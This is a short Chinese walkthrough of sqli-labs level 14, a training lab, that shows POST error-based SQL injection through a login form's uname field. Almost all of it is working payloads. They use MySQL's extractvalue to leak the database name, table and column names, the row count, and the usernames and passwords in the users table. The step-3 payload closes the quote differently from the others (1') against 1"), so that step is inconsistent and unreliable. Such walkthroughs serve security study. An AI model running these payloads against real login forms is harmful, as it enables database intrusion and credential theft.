sqli-labs第十四关——“POST报错注入

一：判断注入类型

和上一关一样，输入如下代码，回显报错，其余类型无回显

uname=1"&passwd=123

判断为双引号字符型，尝试闭合

判断正确，成功登录

二：开始攻击

1.爆数据库名

uname=1" and extractvalue(1,concat(0x7e,(select database())))#&passwd=123

2. 爆表名

uname=1" and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())))#&passwd=123

3.爆列名

uname=1') and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name='users')))#&passwd=123

4.爆数据

判断数据量

uname=1" and extractvalue(1,concat(0x7e,(select count(*) from users)))#&passwd=123

分两段爆数据

uname=1" and extractvalue(1,concat(0x7e, substring((select group_concat(username,0x3a,password) from users),1,32)))#&passwd=123
uname=1" and extractvalue(1,concat(0x7e, substring((select group_concat(username,0x3a,password) from users),32,32)))#&passwd=123

❀❀❀ 完结撒花！！ ❀❀❀